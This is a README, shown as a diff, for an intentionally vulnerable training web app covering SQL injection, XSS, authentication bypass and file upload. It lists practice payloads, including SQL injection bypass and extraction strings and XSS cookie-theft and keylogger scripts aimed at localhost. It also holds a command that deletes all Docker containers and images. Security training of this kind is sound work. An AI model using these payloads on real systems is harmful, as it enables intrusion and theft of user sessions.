|
| 1 | +# 516 Hackers Vulnerability Playground 🔓 |
| 2 | + |
| 3 | +An intentionally vulnerable web application designed for security training, similar to DVWA but modular. Perfect for learning about web vulnerabilities in a safe, controlled environment. |
| 4 | + |
| 5 | + |
| 6 | + |
| 7 | + |
| 8 | + |
| 9 | + |
| 10 | +## ⚠️ IMPORTANT WARNING |
| 11 | + |
| 12 | +**FOR TRAINING AND EDUCATIONAL PURPOSES ONLY** |
| 13 | + |
| 14 | +- 🚫 **DO NOT** deploy in production environments |
| 15 | +- 🚫 **DO NOT** expose to the internet |
| 16 | +- 🚫 **DO NOT** use with real/sensitive data |
| 17 | +- ✅ **ONLY** use in isolated, local environments |
| 18 | +- ✅ **ONLY** for legitimate security training |
| 19 | + |
| 20 | +## 🚀 Quick Start |
| 21 | + |
| 22 | +### Prerequisites |
| 23 | +- Docker and Docker Compose installed |
| 24 | +- Git installed |
| 25 | +- At least 2GB free disk space |
| 26 | + |
| 27 | +### Step-by-Step Setup |
| 28 | + |
| 29 | +#### 1. Clone the Repository |
| 30 | +```bash |
| 31 | +# Clone using HTTPS |
| 32 | +git clone https://github.com/516hackers/516-hackers-vuln-playground.git |
| 33 | + |
| 34 | +# Or using SSH |
| 35 | +git clone git@github.com:516hackers/516-hackers-vuln-playground.git |
| 36 | + |
| 37 | +# Navigate to project directory |
| 38 | +cd 516-hackers-vuln-playground |
| 39 | +``` |
| 40 | + |
| 41 | +#### 2. Build and Run with Docker |
| 42 | +```bash |
| 43 | +# Build and start all services |
| 44 | +docker-compose up --build |
| 45 | + |
| 46 | +# To run in background (detached mode) |
| 47 | +docker-compose up -d --build |
| 48 | +``` |
| 49 | + |
| 50 | +#### 3. Access the Application |
| 51 | +Open your browser and navigate to: |
| 52 | +``` |
| 53 | +http://localhost:3000 |
| 54 | +``` |
| 55 | + |
| 56 | +#### 4. Verify Installation |
| 57 | +You should see the main dashboard with four vulnerability modules. The application comes pre-loaded with sample data. |
| 58 | + |
| 59 | +## 🛠️ Project Structure |
| 60 | + |
| 61 | +``` |
| 62 | +516-hackers-vuln-playground/ |
| 63 | +├── docker-compose.yml # Multi-container setup |
| 64 | +├── README.md # This file |
| 65 | +├── backend/ |
| 66 | +│ ├── package.json # Node.js dependencies |
| 67 | +│ ├── server.js # Main Express server |
| 68 | +│ ├── Dockerfile # Backend container setup |
| 69 | +│ ├── routes/ # Vulnerability modules |
| 70 | +│ │ ├── sqli.js # SQL Injection |
| 71 | +│ │ ├── xss.js # Cross-site Scripting |
| 72 | +│ │ ├── auth.js # Authentication Bypass |
| 73 | +│ │ └── file-upload.js # File Upload vulnerabilities |
| 74 | +│ └── database/ |
| 75 | +│ └── init.sql # Database schema and sample data |
| 76 | +├── frontend/ |
| 77 | +│ ├── index.html # Main interface |
| 78 | +│ ├── css/ |
| 79 | +│ │ └── style.css # Styling |
| 80 | +│ └── js/ |
| 81 | +│ └── app.js # Frontend logic |
| 82 | +└── scripts/ |
| 83 | + ├── test-sqli.js # SQLi testing scripts |
| 84 | + ├── test-xss.js # XSS testing scripts |
| 85 | + └── test-auth.js # Auth testing scripts |
| 86 | +``` |
| 87 | + |
| 88 | +## 📚 Vulnerability Modules |
| 89 | + |
| 90 | +### 1. SQL Injection (SQLi) 💉 |
| 91 | +**Location**: SQL Injection module in the web interface |
| 92 | + |
| 93 | +**Vulnerable Endpoint**: `/sqli/search` |
| 94 | + |
| 95 | +**Practice Payloads**: |
| 96 | +```sql |
| 97 | +-- Basic bypass |
| 98 | +admin' OR '1'='1 |
| 99 | + |
| 100 | +-- Union attack |
| 101 | +' UNION SELECT 1,2,3,4,5-- - |
| 102 | +
|
| 103 | +-- Database enumeration |
| 104 | +' UNION SELECT version(),user(),database(),4,5-- - |
| 105 | + |
| 106 | +-- Table extraction |
| 107 | +' UNION SELECT table_name,2,3,4,5 FROM information_schema.tables-- - |
| 108 | +``` |
| 109 | +
|
| 110 | +**Learning Objectives**: |
| 111 | +- Understand how SQL injection works |
| 112 | +- Learn to exploit authentication bypass |
| 113 | +- Practice data extraction techniques |
| 114 | +- Compare vulnerable vs secure code |
| 115 | +
|
| 116 | +### 2. Cross-Site Scripting (XSS) 🦠 |
| 117 | +**Location**: XSS module in the web interface |
| 118 | +
|
| 119 | +**Vulnerable Endpoint**: `/xss/comment` |
| 120 | +
|
| 121 | +**Practice Payloads**: |
| 122 | +```html |
| 123 | +<!-- Basic alert --> |
| 124 | +<script>alert('XSS')</script> |
| 125 | +
|
| 126 | +-- Image-based XSS |
| 127 | +<img src=x onerror=alert(1)> |
| 128 | +
|
| 129 | +-- Cookie theft |
| 130 | +<script>fetch('http://localhost:3000/steal?cookie='+document.cookie)</script> |
| 131 | +
|
| 132 | +-- Keylogger |
| 133 | +<script>document.onkeypress=function(e){fetch('http://localhost:3000/log?key='+e.key)}</script> |
| 134 | +``` |
| 135 | +
|
| 136 | +**Learning Objectives**: |
| 137 | +- Understand reflected vs stored XSS |
| 138 | +- Learn DOM-based XSS techniques |
| 139 | +- Practice input sanitization methods |
| 140 | +- Compare vulnerable vs secure implementations |
| 141 | +
|
| 142 | +### 3. Authentication Bypass 🔑 |
| 143 | +**Location**: Authentication Bypass module |
| 144 | +
|
| 145 | +**Vulnerable Endpoint**: `/auth/login-weak` |
| 146 | +
|
| 147 | +**Practice Techniques**: |
| 148 | +```sql |
| 149 | +-- SQL injection in login |
| 150 | +admin' OR '1'='1'-- - |
| 151 | + |
| 152 | +-- Password field bypass |
| 153 | +admin' OR '1'='1'-- - |
| 154 | +
|
| 155 | +-- Always true condition |
| 156 | +' OR 1=1-- - |
| 157 | +``` |
| 158 | + |
| 159 | +**Learning Objectives**: |
| 160 | +- Understand weak authentication mechanisms |
| 161 | +- Learn session management vulnerabilities |
| 162 | +- Practice privilege escalation |
| 163 | +- Implement secure authentication |
| 164 | + |
| 165 | +### 4. File Upload Vulnerabilities 📁 |
| 166 | +**Location**: File Upload module |
| 167 | + |
| 168 | +**Vulnerable Endpoint**: `/file-upload/insecure` |
| 169 | + |
| 170 | +**Practice Uploads**: |
| 171 | +- PHP shell files |
| 172 | +- Executable files with dangerous extensions |
| 173 | +- Overwrite existing files |
| 174 | +- Path traversal in filenames |
| 175 | + |
| 176 | +**Learning Objectives**: |
| 177 | +- Understand unrestricted file upload risks |
| 178 | +- Learn file type validation |
| 179 | +- Practice secure upload configurations |
| 180 | +- Implement proper file sanitization |
| 181 | + |
| 182 | +## 🔧 Management Commands |
| 183 | + |
| 184 | +### Starting and Stopping |
| 185 | +```bash |
| 186 | +# Start services |
| 187 | +docker-compose up |
| 188 | + |
| 189 | +# Start in background |
| 190 | +docker-compose up -d |
| 191 | + |
| 192 | +# Stop services |
| 193 | +docker-compose down |
| 194 | + |
| 195 | +# Stop and remove volumes (reset data) |
| 196 | +docker-compose down -v |
| 197 | + |
| 198 | +# View logs |
| 199 | +docker-compose logs |
| 200 | + |
| 201 | +# View specific service logs |
| 202 | +docker-compose logs web |
| 203 | +docker-compose logs db |
| 204 | +``` |
| 205 | + |
| 206 | +### Database Operations |
| 207 | +```bash |
| 208 | +# Access MySQL database |
| 209 | +docker-compose exec db mysql -u root -p vuln_app |
| 210 | +# Password: password |
| 211 | + |
| 212 | +# Reset database |
| 213 | +docker-compose down -v |
| 214 | +docker-compose up -d |
| 215 | +``` |
| 216 | + |
| 217 | +### Development Commands |
| 218 | +```bash |
| 219 | +# Access backend container |
| 220 | +docker-compose exec web sh |
| 221 | + |
| 222 | +# Install new dependencies |
| 223 | +docker-compose exec web npm install <package> |
| 224 | + |
| 225 | +# View application logs |
| 226 | +docker-compose logs web -f |
| 227 | +``` |
| 228 | + |
| 229 | +## 🧪 Testing Scripts |
| 230 | + |
| 231 | +Run automated tests to verify vulnerabilities: |
| 232 | + |
| 233 | +```bash |
| 234 | +# Test SQL Injection vulnerabilities |
| 235 | +node scripts/test-sqli.js |
| 236 | + |
| 237 | +# Test XSS vulnerabilities |
| 238 | +node scripts/test-xss.js |
| 239 | + |
| 240 | +# Test authentication bypass |
| 241 | +node scripts/test-auth.js |
| 242 | +``` |
| 243 | + |
| 244 | +## 🎯 Learning Path |
| 245 | + |
| 246 | +### Beginner Level |
| 247 | +1. Start with SQL Injection module |
| 248 | +2. Try basic payloads like `admin' OR '1'='1` |
| 249 | +3. Understand how the vulnerable code works |
| 250 | +4. Compare with the secure version |
| 251 | + |
| 252 | +### Intermediate Level |
| 253 | +1. Practice advanced SQLi techniques |
| 254 | +2. Experiment with different XSS payloads |
| 255 | +3. Try authentication bypass methods |
| 256 | +4. Understand session management issues |
| 257 | + |
| 258 | +### Advanced Level |
| 259 | +1. Chain multiple vulnerabilities |
| 260 | +2. Write custom exploit scripts |
| 261 | +3. Analyze the secure code implementations |
| 262 | +4. Propose additional security improvements |
| 263 | + |
| 264 | +## 🔒 Security Best Practices Demonstrated |
| 265 | + |
| 266 | +Each module includes both **vulnerable** and **secure** implementations: |
| 267 | + |
| 268 | +### SQL Injection Protection |
| 269 | +- **Vulnerable**: String concatenation in queries |
| 270 | +- **Secure**: Parameterized queries with prepared statements |
| 271 | + |
| 272 | +### XSS Protection |
| 273 | +- **Vulnerable**: Direct output without sanitization |
| 274 | +- **Secure**: Input validation and output encoding |
| 275 | + |
| 276 | +### Authentication Security |
| 277 | +- **Vulnerable**: Plain text passwords, SQL in authentication |
| 278 | +- **Secure**: Password hashing, parameterized queries, session management |
| 279 | + |
| 280 | +### File Upload Security |
| 281 | +- **Vulnerable**: No file type checking, original filenames |
| 282 | +- **Secure**: Whitelist validation, safe filenames, size limits |
| 283 | + |
| 284 | +## 🐛 Troubleshooting |
| 285 | + |
| 286 | +### Common Issues |
| 287 | + |
| 288 | +**Port already in use**: |
| 289 | +```bash |
| 290 | +# Change ports in docker-compose.yml |
| 291 | +ports: |
| 292 | + - "3001:3000" # Use different host port |
| 293 | +``` |
| 294 | + |
| 295 | +**Database connection issues**: |
| 296 | +```bash |
| 297 | +# Reset everything |
| 298 | +docker-compose down -v |
| 299 | +docker-compose up --build |
| 300 | +``` |
| 301 | + |
| 302 | +**Application not loading**: |
| 303 | +```bash |
| 304 | +# Check if all services are running |
| 305 | +docker-compose ps |
| 306 | + |
| 307 | +# Check logs for errors |
| 308 | +docker-compose logs |
| 309 | +``` |
| 310 | + |
| 311 | +**File uploads not working**: |
| 312 | +```bash |
| 313 | +# Ensure upload directories exist |
| 314 | +mkdir -p backend/uploads backend/secure-uploads |
| 315 | + |
| 316 | +# Check directory permissions |
| 317 | +chmod 755 backend/uploads backend/secure-uploads |
| 318 | +``` |
| 319 | + |
| 320 | +### Reset Everything |
| 321 | +```bash |
| 322 | +# Complete reset |
| 323 | +docker-compose down -v |
| 324 | +docker rm -f $(docker ps -aq) |
| 325 | +docker rmi -f $(docker images -q) |
| 326 | +docker-compose up --build |
| 327 | +``` |
| 328 | + |
| 329 | +## 📖 Educational Resources |
| 330 | + |
| 331 | +### Recommended Learning Materials |
| 332 | +- OWASP Top 10 |
| 333 | +- Web Application Security Testing methodologies |
| 334 | +- Secure coding practices |
| 335 | +- Penetration testing frameworks |
| 336 | + |
| 337 | +### Next Steps After This Playground |
| 338 | +1. Try other vulnerable applications (DVWA, WebGoat, bWAPP) |
| 339 | +2. Practice on bug bounty platforms (with permission) |
| 340 | +3. Study secure coding guidelines |
| 341 | +4. Explore advanced exploitation techniques |
| 342 | + |
| 343 | +## 🤝 Contributing |
| 344 | + |
| 345 | +We welcome contributions! Please: |
| 346 | + |
| 347 | +1. Fork the repository |
| 348 | +2. Create a feature branch |
| 349 | +3. Make your changes |
| 350 | +4. Add tests if applicable |
| 351 | +5. Submit a pull request |
| 352 | + |
| 353 | +### Adding New Vulnerabilities |
| 354 | +1. Create new route file in `backend/routes/` |
| 355 | +2. Add frontend interface in `frontend/` |
| 356 | +3. Update navigation in `frontend/index.html` |
| 357 | +4. Add test scripts in `scripts/` |
| 358 | +5. Update this README |
| 359 | + |
| 360 | +## 📄 License |
| 361 | + |
| 362 | +This project is for educational purposes only. Use responsibly and only in environments you own or have explicit permission to test. |
| 363 | + |
| 364 | +## 🆘 Support |
| 365 | + |
| 366 | +If you encounter issues: |
| 367 | +1. Check the troubleshooting section above |
| 368 | +2. Review Docker and system requirements |
| 369 | +3. Check the GitHub issues page |
| 370 | +4. Create a new issue with detailed information |
| 371 | + |
| 372 | +--- |
| 373 | + |
| 374 | +**Remember**: With great power comes great responsibility. Use these skills ethically and legally! 🛡️ |
| 375 | + |
| 376 | +--- |
| 377 | + |
| 378 | +*Created with ❤️ by 516 Hackers for the security community* |
0 commit comments